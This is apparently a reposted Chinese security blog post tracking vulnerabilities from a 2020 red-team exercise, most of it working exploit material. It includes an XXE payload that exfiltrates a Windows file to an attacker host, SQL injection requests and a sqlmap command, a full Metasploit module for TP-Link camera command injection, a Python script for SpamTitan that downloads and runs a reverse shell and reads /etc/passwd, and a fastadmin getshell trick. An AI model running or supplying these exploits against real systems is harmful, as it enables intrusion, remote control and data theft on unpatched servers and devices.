HW2020 - 漏洞跟踪5

admin 2020年9月23日17:22:00评论652 views字数 17178阅读57分15秒阅读模式


https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34) 《HW2020 - 0day总结》


1.用友GRP-u8 SQL注入2.天融信TopApp-LB sql注入3.深信服EDR RCE漏洞4.绿盟UTS绕过登录5.WPS命令执行漏洞6.齐治堡垒机 rce7.联软准入漏洞8.泛微云桥任意文件读取9.深信服 SSL VPN 远程代码执行漏洞(暂无)10.Apache DolphinScheduler 远程代码执行漏洞11.Exchange Server 远程代码执行漏洞12.Apache DolphinScheduler 权限覆盖漏洞[CVE-2020-13922]13.Netlogon 特权提升漏洞(CVE-2020-147214.coremail 0day - may be rce(无)15.activemq远程代码执行0day16.天融信数据防泄漏系统越权修改管理员密码17.Wordpress File-manager任意文件上传18.CVE-2020-7293  McAfee Web 多个高危漏洞19.ThinkAdminV6 任意文件操作20.VMware Fusion 权限提升漏洞(CVE-2020-398021.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞22. Weblogic IIOP 反序列化漏洞23.Yii框架多个反序列化RCE利用链24.深信服SSL VPN nday Pre auth任意密码重置25.深信服SSL VPN 修改绑定手机号26.Spectrum Protect Plus任意代码执行漏洞(cve-2020-471127.mssql远程代码执行(CVE-2020-0618)28.CVE-2020-4643 IBM WebSphere存在XXE外部实体注入漏洞29.Joomla! paGO Commerce 存在SQL 注入30.绿盟waf封禁绕过31.Typesetter CMS任意文件上传32.UsualToolCMS-8.0 sql注入漏洞33.TP-Link云摄像头NCXXX系列存在命令注入漏洞33.SpamTitan 7.07多个RCE漏洞34.BSPHP存在未授权访问35.fastadmin最新版前台getshell


HW2020 - 漏洞跟踪5

28.CVE-2020-4643 IBM WebSphere存在XXE外部实体注入漏洞


IBM WebSphere 应用程序服务器7.0、8.0、8.5 和9.0 在处理XML 数据时容易受XML 外部实体注入(XXE) 攻击。远程攻击者可以利用此漏洞公开敏感信息。IBM Xforce ID:185590。


WebSphere Application Server 7.0版本

WebSphere Application Server 8.0版本

WebSphere Application Server 8.5版本

WebSphere Application Server 9.0版本



WebSphere -版本,建议升级到9.0.5.6以上版本或安装补丁

WebSphere -版本,建议升级到8.5.5.19以上版本或安装补丁

WebSphere -版本,建议先升级到8.0.0.15版本再安装补丁

WebSphere - 版本,建议先升级到7.0.0.45版本再安装补丁

poc:xml如下:<!DOCTYPE x [   <!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">   <!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">   %bbb;]> <definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">  &ddd; </definitions> xx.dtd如下: <!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>&#39;>'>%ccc;









29.Joomla! paGO Commerce 存在SQL 注入

POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 163Origin: http://localhostConnection: closeReferer: http://localhost/joomla/administrator/index.php?option=com_pago&view=commentsCookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1Upgrade-Insecure-Requests: 1
Sqlmap poc:
sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published


31.Typesetter CMS任意文件上传


32.UsualToolCMS-8.0 sql注入漏洞


a_templetex.php?t=open&id=1&paths=templete/index' where id=1 and if(ascii(substring(user(),1,1))>0,sleep(5),1)--+
HW2020 - 漏洞跟踪5


### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',        'Description' => %q{          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,          NC250, NC260, NC450) are vulnerable to an authenticated command          injection. In all devices except NC210, despite a check on the name length in          swSystemSetProductAliasCheck, no other checks are in place in order          to prevent shell metacharacters from being introduced. The system name          would then be used in swBonjourStartHTTP as part of a shell command          where arbitrary commands could be injected and executed as root. NC210 devices          cannot be exploited directly via /setsysname.cgi due to proper input          validation. NC210 devices are still vulnerable since swBonjourStartHTTP          did not perform any validation when reading the alias name from the          configuration file. The configuration file can be written, and code          execution can be achieved by combining this issue with CVE-2020-12110.        },        'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'],        'License' => MSF_LICENSE,        'References' =>        [          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ],          [ 'CVE', '2020-12109']        ],        'DisclosureDate' => '2020-04-29',        'Platform' => 'linux',        'Arch' => ARCH_MIPSLE,        'Targets' =>        [          [            'TP-Link NC200, NC220, NC230, NC250',            {              'Arch' => ARCH_MIPSLE,              'Platform' => 'linux',              'CmdStagerFlavor' => [ 'wget' ]            }          ],          [            'TP-Link NC260, NC450',            {              'Arch' => ARCH_MIPSLE,              'Platform' => 'linux',              'CmdStagerFlavor' => [ 'wget' ],              'DefaultOptions' => { 'SSL' => true }            }          ]        ],        'DefaultTarget' => 0      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ])      ]    )  end  def login    user = datastore['USERNAME']    pass = Base64.strict_encode64(datastore['PASSWORD'])    if target.name == 'TP-Link NC260, NC450'      pass = Rex::Text.md5(pass)    end    print_status("Authenticating with #{user}:#{pass} ...")    begin      res = send_request_cgi({        'uri' => '/login.fcgi',        'method' => 'POST',        'vars_post' => {          'Username' => user,          'Password' => pass        }      })      if res.nil? || res.code == 404        fail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?')      end      if res.body =~ /"errorCode":0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/        print_good("Logged-in as #{user}")        @cookie = res.get_cookies.scan(/s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]        print_good("Got cookie: #{@cookie}")        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]        print_good("Got token: #{@token}")      else        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")      end    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, 'Connection failed')    end  end  def enable_bonjour    res = send_request_cgi({      'uri' => '/setbonjoursetting.fcgi',      'method' => 'POST',      'encode_params' => false,      'cookie' => "sess=#{@cookie}",      'vars_post' => {        'bonjourState' => '1',        'token' => @token.to_s      }    })    return res  rescue ::Rex::ConnectionError    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")    return nil  end  def sys_name(cmd)    res = send_request_cgi({      'uri' => '/setsysname.fcgi',      'method' => 'POST',      'encode_params' => true,      'cookie' => "sess=#{@cookie}",      'vars_post' => {        'sysname' => cmd,        'token' => @token.to_s      }    })    return res  rescue ::Rex::ConnectionError    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")    return nil  end  def execute_command(cmd, _opts = {})    print_status("Executing command: #{cmd}")    sys_name("$(#{cmd})")  end  def exploit    login # Get cookie and csrf token    enable_bonjour # Enable bonjour service    execute_cmdstager # Upload and execute payload    sys_name('NC200') # Set back an innocent-looking device name  endend

33.SpamTitan 7.07多个RCE漏洞

III. PoC~~~~~~~Use python 3 and install the following modules before executing: requests.If your IP is and the target SpamTitan server isspamtitan.example.com, call the PoC like this:./multirce.py -t spamtitan.example.com -i -m <EXPLOITNUMBER> -u <USER> -p <PASSWORD> -U!/usr/bin/env python# Author: Felipe Molina (@felmoltor)# Date: 09/04/2020# Python Version: 3.7# Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read#          0days on SpamTitan 7.07 and previous versions.# Product URL: https://www.spamtitan.com/# Product Version: 7.07 and probably previousimport requestsfrom requests import Timeoutrequests.packages.urllib3.disable_warnings()import osimport threadingfrom optparse import OptionParserimport socketimport jsonimport refrom urllib.parse import urlparsefrom time import sleepfrom base64 import b64decode,b64encodedef myip():    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)    try:        # doesn't even have to be reachable        s.connect(('', 1))        IP = s.getsockname()[0]    except:        IP = ''    finally:        s.close()    return IPdef shellServer(ip,port,quiet):    servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    servers.bind((ip, port))    servers.listen(1)    info("Waiting for incoming connection on %s:%s" % (ip,port))    conn, addr = servers.accept()    conn.settimeout(1)    success("Hurray, we got a connection from %s" % addr[0])    prompt =conn.recv(128)    prompt=str(prompt.decode("utf-8")).strip()    command = input(prompt)    while True:        try:            c = "%sn" % (command)            if (len(c)>0):                conn.sendall(c.encode("utf-8"))                # Quit the console                if command == 'exit':                    info("nClosing connection")                    conn.close()                    break                else:                    completeanswer=""                    while True:                        answer=None                        try:                            answer=str((conn.recv(1024)).decode("utf-8"))                            completeanswer+=answer                        except socket.timeout:                            completeanswer.strip()                            break                    print(completeanswer,end='')            command = input("")        except (KeyboardInterrupt, EOFError):            info("nClosing connection")            break# This is an authenticated remote code execution in "certs-x.php". E.g:def CVE_2020_11699(cookies, target, shellurl):    # Giving time to the maim thread to open the reverse shell listener    sleep(5)    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python/tmp/r.py" % (shellurl)    t1 = "%s/certs.php" % target    t2 = "%s/certs-x.php" % target    # get the csrf token value    res1 = requests.get(t1,cookies=cookies,verify=False)    m = re.search("var csrf_token_postdata=.*CSRFName=(.*)&CSRFToken=(.*)";",res1.text)    if (m is not None):        csrfguard=m.group(1)        csrftoken=m.group(2)        data = {            "CSRFName":csrfguard,            "CSRFToken":csrftoken,            "jaction":"deletecert",            "fname":"dummy || $(%s)" % oscmd        }        info("Triggering the reverse shell in the target.")        try:            res2 = requests.post(t2,data=data,cookies=cookies,verify=False)            print(res2.text)        except Timeout:            info("Request timed-out. You should have received alreadyyour reverse shell.")    else:        fail("CSRF tokens were not found. POST will fail.")# This is an arbitrary file read on "certs-x.php"def CVE_2020_11700(cookies,target,file):    fullpath="../../../..%s" % file    t1 = "%s/certs.php" % target    t2 = "%s/certs-x.php" % target    # get the csrf token value    res1 = requests.get(t1,cookies=cookies,verify=False)    m = re.search("var csrf_token_postdata=.*CSRFName=(.*)&CSRFToken=(.*)";",res1.text)    if (m is not None):        csrfguard=m.group(1)        csrftoken=m.group(2)        data = {            "CSRFName":csrfguard,            "CSRFToken":csrftoken,            "jaction":"downloadkey",            "fname":fullpath,            "commonname":"",            "organization":"",            "organizationunit":"",            "city":"",            "state":"",            "country":"",            "csrout":"",            "pkout":"",            "importcert":"",            "importkey":"",            "importchain":""        }        res2 = requests.post(t2,data=data,cookies=cookies,verify=False)        if (res2.status_code == 200):            success("Contents of the file %s" % file)            print(res2.text)    else:        fail("Error obtaining the CSRF guard tokens from the page.")        return False# This is an authenticated RCE abusing PHP eval function in mailqueue.phpdef CVE_2020_11803(cookies, target, shellurl):    # Giving time to the maim thread to open the reverse shell listener    sleep(5)    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python/tmp/r.py" % (shellurl)    b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8")    payload="gotopage+a+";$b="%s";shell_exec(base64_decode(urldecode($b)));die();$b=""% (b64)    t1 = "%s/certs.php" % target    t2 = "%s/mailqueue.php" % target    # get the csrf token value    res1 = requests.get(t1,cookies=cookies,verify=False)    m = re.search("var csrf_token_postdata=.*CSRFName=(.*)&CSRFToken=(.*)";",res1.text)    if (m is not None):        csrfguard=m.group(1)        csrftoken=m.group(2)        data = {            "CSRFName":csrfguard,            "CSRFToken":csrftoken,            "jaction":payload,            "activepage":"incoming",            "incoming_count":"0",            "active_count":"0",            "deferred_count":"0",            "hold_count":"0",            "corrupt_count":"0",            "incoming_page":"1",            "active_page":"1",            "deferred_page":"1",            "hold_page":"1",            "corrupt_page":"1",            "incomingrfilter":None,            "incomingfilter":None,            "incoming_option":"hold",            "activerfilter":None,            "activefilter":None,            "active_option":"hold",            "deferredrfilter":None,            "deferredfilter":None,            "deferred_option":"hold",            "holdrfilter":None,            "holdfilter":None,            "hold_option":"release",            "corruptrfilter":None,            "corruptfilter":None,            "corrupt_option":"delete"        }        # We have to pass a string instead of a dict if we don't wantthe requests library to convert it to        # an urlencoded data and break our payload        datastr=""        cont=0        for k,v in data.items():            datastr+="%s=%s" % (k,v)            cont+=1            if (cont<len(data)):                datastr+="&"        headers={            "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0)Gecko/20100101 Firefox/68.0",            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",            "Content-Type": "application/x-www-form-urlencoded"        }        try:            res2 =requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies)        except Timeout:            info("Request timed-out. You should have received alreadyyour reverse shell.")    else:        fail("CSRF tokens were not found. POST will fail.")# This is an authenticated RCE abusing qid GET parameter in mailqueue.phpdef CVE_2020_11804(cookies, target, shellurl):    # Giving time to the maim thread to open the reverse shell listener    sleep(5)    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python/tmp/r.py" % (shellurl)    payload="1;`%s`" % oscmd    t = "%s/mailqueue.php?qid=%s" % (target,payload)    info("Triggering the reverse shell in the target.")    try:        res2 = requests.get(t,cookies=cookies,verify=False)    except Timeout:        info("Request timed-out. You should have received already yourreverse shell.")# Authenticate to the web platform and get the cookiesdef authenticate(target,user,password):    loginurl="%s/login.php" % target    data={        "jaction":"none",        "language":"en_US",        "address":"%s" % user,        "passwd":"%s" % password    }    res = requests.post(loginurl, data=data,allow_redirects =False,verify=False)    if (res.status_code == 302 and len(res.cookies.items())>0):        return res.cookies    else:        return Nonedef printmsg(msg,quiet=False,msgtype="i"):    if (not quiet):        if (success):            print("[%s] %s" % (msgtype,msg))        else:            print("[-] %s" % msg)def info(msg,quiet=False):    printmsg(msg,quiet,msgtype="i")def success(msg,quiet=False):    printmsg(msg,quiet,msgtype="+")def fail(msg,quiet=False):    printmsg(msg,quiet,msgtype="-")def parseoptions():    parser = OptionParser()    parser.add_option("-t", "--target", dest="target",                    help="Target SpamTitan URL to attack. E.g.:https://spamtitan.com/", default=None)    parser.add_option("-m", "--method", dest="method",                    help="Exploit number: (1) CVE-2020-11699 [RCE],(2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700[File Read]", default=1)    parser.add_option("-u", "--user", dest="user",                    help="Username to authenticate with. Default:admin", default="admin")    parser.add_option("-p", "--password", dest="password",                    help="Password to authenticate with. Default:hiadmin", default="hiadmin")    parser.add_option("-I", "--ip", dest="ip",                    help="Local IP where to listen for the reverseshell. Default: %s" % myip(), default=myip())    parser.add_option("-P", "--port", dest="port",                    help="Local Port where to listen for the reverseshell. Default: 4242", default=4242)    parser.add_option("-U", "--URL", dest="shellurl",                    help="HTTP URL path where the reverse shell islocated. Default: http://%s/rev.py" % myip(),default="http://%s/rev.py" % myip())    parser.add_option("-f", "--filetoread", dest="filtetoread",                    help="Full path of the file to read from theremote server when executing CVE-2020-11700. Default: /etc/passwd",default="/etc/passwd")    parser.add_option("-q", "--quiet",                    action="store_true", dest="quiet", default=False,                    help="Shut up script! Just give me the shell.")    return parser.parse_args()def main():    (options,arguments) = parseoptions()    quiet = options.quiet    target = options.target    ip = options.ip    port = options.port    user = options.user    password = options.password    shellurl = options.shellurl    method = int(options.method)    rfile = options.filtetoread    # Sanitize options    if (target is None):        fail("Error. Specify a target (-t).")        exit(1)    else:        if (not target.startswith("http://") and nottarget.startswith("https://")):            target = "http://%s" % target    if (method < 1 or method > 4):        fail("Error. Specify a method from 1 to 4:n (1)CVE-2020-11699 [RCE]n (2) CVE-2020-XXXX [RCE]n (3) CVE-2020-XXXX2[RCE]n (4) CVE-2020-11700 [File Read]")        exit(1)    # Before doing anything, login    cookies = authenticate(target,user,password)    if (cookies is not None):        success("User logged in successfully.")        if (method == 1):            info("Exploiting CVE-2020-11699 to get a reverse shell on%s:%s" % (ip,port),quiet)            rev_thread = threading.Thread(target=CVE_2020_11699,args=(cookies,target,shellurl))            rev_thread.start()            # Open the reverse shell listener in this main thread            info("Spawning a reverse shell listener. Wait for it...")            shellServer(options.ip,int(options.port),options.quiet)        elif (method == 2):            info("Exploiting CVE-2020-11803 to get a reverse shell on%s:%s" % (ip,port),quiet)            rev_thread = threading.Thread(target=CVE_2020_11803,args=(cookies,target,shellurl))            rev_thread.start()            # Open the reverse shell listener in this main thread            info("Spawning a reverse shell listener. Wait for it...")            shellServer(options.ip,int(options.port),options.quiet)        elif (method == 3):            info("Exploiting CVE-2020-11804 to get a reverse shell on%s:%s" % (ip,port),quiet)            rev_thread = threading.Thread(target=CVE_2020_11804,args=(cookies,target,shellurl))            rev_thread.start()            # Open the reverse shell listener in this main thread            info("Spawning a reverse shell listener. Wait for it...")            shellServer(options.ip,int(options.port),options.quiet)        elif (method == 4):            info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)            CVE_2020_11700(cookies,target,rfile)    else:        fail("Error authenticating. Are you providing valid credentials?")        exit(2)    exit(0)main()




HW2020 - 漏洞跟踪5




HW2020 - 漏洞跟踪5

HW2020 - 漏洞跟踪5


上传图片,修改图片数据包为> {php}phpinfo();[/php]记录路径> Public/index/user/_empty?name=../public/upload/xxx.jpg即可getshell


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  • 本文由 发表于 2020年9月23日17:22:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HW2020 - 漏洞跟踪5https://cn-sec.com/archives/140342.html


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